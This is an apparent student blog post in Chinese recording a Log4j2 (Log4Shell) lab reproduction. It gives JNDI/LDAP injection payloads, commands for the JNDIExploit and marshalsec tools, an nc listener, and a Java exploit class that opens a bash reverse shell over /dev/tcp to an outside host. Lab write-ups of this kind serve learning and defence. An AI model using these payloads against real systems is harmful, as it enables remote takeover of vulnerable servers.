log4j2靶场复现遇见的问题学习记录

最新推荐文章于 2024-05-11 10:15:57 发布

唐龙小柯

最新推荐文章于 2024-05-11 10:15:57 发布

阅读量1k

点赞数

分类专栏：学习过程文章标签：学习

本文链接：https://blog.csdn.net/m0_69546873/article/details/126716030

版权

学习过程专栏收录该内容

5 篇文章 0 订阅

订阅专栏

一、前言

学习log4j2漏洞，把遇到的问题做一个记录，方便学习交流，学习过程中参考了其他人的博客，靶场来自于掌控安全的靶场环境，地址如下：

用户登录

二、先在dnslog平台测试了一下，存在log4j2漏洞回显，命令：${jndi:ldap://dnslog地址}，ldap是一个协议访问，具体可以百度。

三、需要用到的工具 JNDIExploit-1.2-SNAPSHOT.jar，可以直接在GitHub上面搜索下载。

四、在 jar包目录下面运行程序java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 公网ip，运行命令后开启了ldap服务并且监听1389端口

五、在靶场注入点使用命令 ${jndi:ldap://vps的IP:1389/Basic/Command/whoami},点击登录

六、登陆后得到回显,证明漏洞存在，然后重新构造payload：${jndi:ldap://vps的IP:1389/Basic/ReverseShell/vps的IP/6666}，在靶场注入框输入。这个payload意思是靶场服务器访问我们公网IP的1389端口，ReverseShell（反弹shell）是payload，我猜应该是前面我们用到的jndi.jar包里已经写好的shell代码包，反弹到公网IP的6666端口。所以这里我们的公网服务器需要开启6666端口和1389端口，并且要提前开启6666端口的监听，代码是nc -lnvp 6666

七、重新注入代码后，我们的1389监听端口收到请求信息，6666端口已经连接shell

成功拿到shell权限

八、问题总结

本文参考了这个博主的文章：掌控者-封神台-Apache Log4j任意代码执行复现_旧目难忘的博客-CSDN博客_任意代码执行复现

这一步之前我遇到的问题是关闭了1389端口ldap服务后再开启的6666监听端口，结果注入之后发现6666端口监听没有反应，以为这个方法不行。然后参考学习了另一个博主的文章，Apache Log4j2 RCE漏洞利用反弹shell合集_山山而川'的博客-CSDN博客_rce反弹shell。

这里是用GitHub - RandomRobbieBF/marshalsec-jar: marshalsec-0.0.3-SNAPSHOT-all compiled on X64

另一个工具开启的ldap服务，开启命令：java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://公网ip的web地址/exp的文件名"（命令意思是使用这个工具包开启ldap服务，让ldap服务的1389端口代理到web地址并运行exp）。注：exp是编写代码后javac编译后的class文件，需要放置在公网web服务的根目录下，就像这样：

exp的代码如下（代码是搬运的，是第二个转载的博主的）：

public class Exploit {
   public Exploit(){
       try{
           // 要执行的命令
           String[] commands = {"bash","-c","exec 5<>/dev/tcp/39.xx.xx.162/6666;cat <&5 | while read line; do $line 2>&5 >&5; done"};
           Process pc = Runtime.getRuntime().exec(commands);
           pc.waitFor();
      } catch(Exception e){
           e.printStackTrace();
      }
}

   public static void main(String[] argv) {
       Exploit e = new Exploit();
}
}

通过编写exp放置在web服务下，让靶场服务器访问1389端口然后跳转至web页面运行exp，进而连接shell。有同学会有疑问，为什么不直接访问web页面运行exp而要中转一次呢？因为这里的log4j2漏洞是通过ldap协议访问实现的，所以这也是我们为什么要利用工具开启ldap服务的原因。

重点：

上面这个方法我试了之后发现1389端口有监听到，但是6666端口没有任何响应。然后又回过头看最开始的方法，结果发现前面失败是因为没有同时开启ldap服务和监听6666端口，导致6666端口无响应，然后重新试了一次，成功连接shell，实现服务器的任意命令执行。

九、学习总结

Apache Log4j2 是一款开源的 Java 日志记录工具，大量的业务框架都使用了该组件。如：Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的，该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中，并未对输入进行严格的判断，从而造成漏洞的发生。
通过这次学习了解了ldap协议，以及对应的代码命令等，另外找工具能力还有待提高。小白初学，希望大佬看到不要见笑